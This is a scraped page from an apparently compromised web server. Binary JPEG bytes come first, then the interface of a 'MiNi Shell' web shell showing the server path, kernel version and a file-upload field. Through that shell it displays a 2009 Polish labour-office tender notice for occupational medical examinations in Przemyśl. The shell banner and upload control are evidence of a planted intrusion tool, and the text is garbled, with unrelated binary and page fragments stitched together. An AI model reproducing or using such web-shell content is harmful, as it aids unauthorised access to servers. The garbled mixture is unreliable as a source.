JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090303/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090303/44815-N-2009.html

<p class="kh_header"><b>Przemyśl: Przedmiotem zamówienia jest wykonanie usług - na przeprowadzenie  badań lekarskich i wydanie  zaświadczenia (WSPÓLNY SŁOWNIK ZAMÓWIEŃ CPV KATEGORIA 85121000-3 Usługi Medyczne)
dla : pracowników PUP, osób bezrobotnych, osób  poszukujących pracy, osób  poszukujących pracy z orzeczonym stopniem niepełnosprawności i innych osób uprawnionych w tym w ramach: Funduszu Pracy,Europejskiego Funduszu Społecznego, Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych i innych funduszy</b><br>
<b>Numer ogłoszenia: 44815 - 2009; data zamieszczenia: 03.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Przemyślu , ul. Katedralna 5, 37-700 Przemyśl, woj. podkarpackie, tel. 0-16 678-59-80, faks 0-16 676-09-04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie usług - na przeprowadzenie  badań lekarskich i wydanie  zaświadczenia (WSPÓLNY SŁOWNIK ZAMÓWIEŃ CPV KATEGORIA 85121000-3 Usługi Medyczne)
dla : pracowników PUP, osób bezrobotnych, osób  poszukujących pracy, osób  poszukujących pracy z orzeczonym stopniem niepełnosprawności i innych osób uprawnionych w tym w ramach: Funduszu Pracy,Europejskiego Funduszu Społecznego, Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych i innych funduszy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest przeprowadzenie:
Badań lekarskich wynikających z zakresu profilaktycznej opieki zdrowotnej dopuszczających do  wykonywania pracy, odbywania stażu, przygotowania zawodowego dorosłych,  wykonywania prac społecznie użytecznych, szkolenia dla -pracowników Powiatowego Urzędu Pracy w Przemyślu, osób bezrobotnych, osób poszukujących pracy, osób poszukujących pracy z orzeczonym stopniem niepełnosprawności i innych uprawnionych osób.  
- Badania lekarskie dotyczyć będą różnych stanowisk pracy.
- W zawodach wymagających specjalistycznych badań osób kierowanych, Zamawiający uznaje za konieczne przeprowadzenie tych badań zgodnie z obowiązującymi przepisami.
- Przeprowadzenie badań  lekarskich i  psychologicznych, mających na celu wydanie opinii o przydatności zawodowej osoby bezrobotnej lub poszukującej pracy do pracy, zawodu lub kierunku szkolenia a także osób objętych poradnictwem indywidualnym, w przypadku których niezbędne jest udokumentowanie braku przeciwwskazań zdrowotnych do wykonywania pracy.
Skierowania na w/w  badania lekarskie i  psychologiczne będą dotyczyć określenia przydatności do pracy lub  szkolenia  w różnych zawodach /np. fryzjer, kierowca wózków jezdniowych z napędem silnikowym, praw jazdy różnych kategorii, instruktorów, egzaminatorów - z badaniami psychologicznymi, operatorów maszyn do robót ziemnych, budowlanych i drogowych, kucharzy, kelnerów- z badaniami sanitarno-epidemiologicznymi, tynkarzy, zbrojarzy-z badaniami wysokościowymi, pilotów wycieczek, itp./
2. Zamawiający określa szacunkową ilość osób, którą zamierza skierować na badania profilaktyczne w okresie : maj 2009 kwiecień 2010 : 
1) wstępnych dla ok. 800 do 1230 osób*
2) okresowych i kontrolnych dla ok.15 do 45 osób*
3) specjalistycznych badań  lekarskich i  psychologicznych, mających na celu  stwierdzenie przydatności  do pracy, zawodu lub kierunku szkolenia dla ok. 140 do 300 osób.* Ogółem dopuszczalna maksymalna liczba osób wynosi 1.575 osób.
* - dopuszczalna maksymalna liczba osób
Wartość przedmiotowej usługi należy obliczyć dla dopuszczonej maksymalnej liczby osób.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, w tym wpis do rejestru Zakładów Opieki Zdrowotnej prowadzonego przez Wojewodę Podkarpackiego.
2 ) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
oraz spełniający następujące warunki szczegółowe : 
5) posiadają niezbędne doświadczenie, tj. wykażą się należytym wykonaniem,   
a  w przypadkach świadczeń okresowych lub ciągłych również wykonywanych, w okresie  ostatnich trzech lat przed  dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej jedną usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia, tj. przez usługi odpowiadające rodzajem przedmiotowi zamówienia Zamawiający rozumie obsługę podmiotów (zakładów pracy) w zakresie medycyny pracy zgłaszających rocznie na przedmiotowe badania co najmniej 100 osób.
6) oraz dysponują  osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, które posiadają następujące kwalifikacje: 
- co najmniej 2 lekarzami medycyny ze specjalizacją z zakresu medycyny pracy,
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu okulistyki,
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu dermatologii,
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu neurologii,
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu ortopedii.
7) dysponują co najmniej 1 placówką, w której wykonywany będzie przedmiot zamówienia, w której zlokalizowane są gabinety lekarskie medycyny pracy oraz gabinety specjalistyczne , laboratorium badań analitycznych i pracownia RTG. Pomieszczenia muszą odpowiadać wymogom pod względem fachowym i sanitarnym  zgodnie  z Rozporządzeniem Ministra Zdrowia z dnia 10 listopada 2006r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym  i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej ( Dz. U z 2006r. Nr 213, poz. 1568 z późn. zm.) - wymagane oświadczenie.                                                                                             8) przeprowadzą badania lekarskie na terenie miasta Przemyśla. 
9) zapewnią wykonanie badań lekarskich pracowników PUP, osób bezrobotnych     
i poszukujących pracy i innych osób uprawnionych co najmniej cztery  dni  w tygodniu, w dni robocze, w godzinach co najmniej od godz. 7.00 lub godz. 8.00 do godz.10.00.
2. Ocena spełnienia przez Wykonawców warunków, o których mowa w pkt. 1 nastąpi na podstawie przedłożonych w ofercie oświadczeń i dokumentów, których wykaz określony został w rozdziale  VI i XI  niniejszej specyfikacji. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg. formuły: (spełnienia - nie spełnienia), na podstawie analizy złożonych dokumentów.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, od Wykonawców ubiegających się o udzielenie zamówienia wymagane jest przedstawienie następujących dokumentów: 
1.1 Oświadczenie  o spełnieniu warunków określonych w  art. 22 ust. 1 pkt 1-3 i  art. 24 ust. 1   i 2 ustawy Pzp ( zalecane wg wzoru oświadczenia- załącznik nr 3 do SIWZ),
1.2 Aktualny odpis  z właściwego rejestru albo aktualne zaświadczenie  o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, a jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzający że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument musi być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3 Aktualny odpis z rejestru Zakładów Opieki Zdrowotnej  prowadzonego przez Wojewodę Podkarpackiego. Dokument musi być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.4. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia  Społecznego  potwierdzające odpowiednio , że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i  społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu, a jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej - dokumenty wystawione w kraju w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne  albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Dokumenty muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.5 Wykaz wykonanych, a w przypadkach świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, odpowiadających swoim rodzajem i wartością dostawom lub usługom  stanowiącym przedmiot zamówienia (z zakresu medycyny pracy), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te dostawy lub usługi zostały wykonane należycie ( według wzoru - Załącznik  nr  5   do SIWZ) 
1.6 Polisy, a w przypadku jej braku  innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
1.7 Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć  w wykonaniu zamówienia posiadających kwalifikacje do wykonania zamówienia, tj:- co najmniej 2 lekarzami medycyny ze specjalizacją z zakresu medycyny pracy,
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu okulistyki,
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu dermatologii,
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu neurologii,
- co najmniej 1 lekarzem medycyny ze specjalizacją z zakresu ortopedii,
(według wzoru wykazu- załącznik nr 4 do SIWZ), wraz z informacjami na temat ich kwalifikacji  zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania zamówienia,  a także zakresu wykonywanych przez nich czynności.
1.8 Dane adresowe placówki/placówek, w których wykonywany będzie przedmiot umowy w mieście Przemyślu, w których znajdują się :
- gabinety lekarskie medycyny pracy oraz
- specjalistyczne gabinety lekarskie oraz
- laboratorium badań analitycznych oraz
- pracownia RTG
(według wzoru wykazu- Załącznik nr  6  do SIWZ), 
wraz: 
- z oświadczeniem o spełnieniu wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia zakładu opieki zdrowotnej  zgodnie  z Rozporządzeniem Ministra Zdrowia z dnia 10 listopada 2006r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej ( Dz. U  z 2006r. Nr 213, poz. 1568 z późn. zm.)
- opisem :
- lokalizacji poradni specjalistycznych, diagnostycznych itp.
- odległości od węzłów komunikacyjnych ( PKS, PKP)
- czasu dojścia  z siedziby Zamawiającego  na badania do placówki medycznej,
- czasu dojazdu  do placówki medycznej z siedziby Zamawiającego 
- możliwości dojazdu środkiem lokomocji/ komunikacji publicznej itp.
1.9. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje  lub będzie dysponował Wykonawca wraz z pisemnym zobowiązaniem innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń jeżeli w wykazie Wykonawca wskazał narzędzie i urządzenia, którymi będzie dysponował.
1.10. Wykonawcy ubiegający się wspólnie o udzielanie zamówienia zobowiązani są, zgodnie z art. 23 ust 2 ustawy Pzp, do załączenia do oferty dokumentu ustanawiającego pełnomocnika Wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia.
Pełnomocnictwo ustanawiające pełnomocnika powinno:
- określać numer sprawy określonej w niniejszej specyfikacji,
- precyzować zakres pełnomocnictwa,
-zostać podpisane przez wszystkich Wykonawców lub osoby upoważnione           do występowania w imieniu Wykonawcy .
2. Forma dokumentów składanych przez Wykonawcę wraz z ofertą: 
2.1. Oświadczenie, o którym mowa w pkt.1.1 należy przedstawić w formie oryginału,
2.2. Dokumenty, o których mowa w pkt.1.2,1.3,1.4, 1.5,1.6,1.7,1.8,1.9, należy przedstawić w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę.
2.3. Załączone dokumenty potwierdzające należyte wykonanie zamówienia w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez  Wykonawcę.
2.4. W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
- oświadczenie wymienione w pkt.1.1 składane jest przez wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia lub przez pełnomocnika upoważnionego do reprezentowania ich w postępowaniu lub reprezentowania w postępowaniu i podpisania umowy, 
- dokumenty wymienione w pkt. 1.2 , 1.3 i 1.4 składa każdy z wykonawców,
- dokumenty wymienione w pkt. 1.5 , 1.6 i 1.7 muszą potwierdzać spełnienie warunków szczegółowych łącznie przez Wykonawców składających wspólnie ofertę,
-dokument wymieniony w pkt.1.10 ustanawiający pełnomocnika Wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2.5. Zamawiający zażąda przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wtedy, gdy złożona przez Wykonawcę kopia dokumentu będzie nieczytelna lub wzbudzi wątpliwości co do jej prawdziwości.
2.6. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej: 
3.1 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których jest mowa w pkt. 1.2 i 1.4 , zastępuje się dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert.
3.2. Dokument wskazany w pkt. 3.1 jest składany w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Termin wykonania badań - 20</li>
<li>3 - Lokalizacja placówki medycznej - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pup.przemysl.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy ul. Katedralna 5 37-700 Przemysl (pok 4).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2009 godzina 09:30, miejsce: Powiatowy Urząd Pracy ul. Katedralna 5 37-700 Przemysl (pok 46 - sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com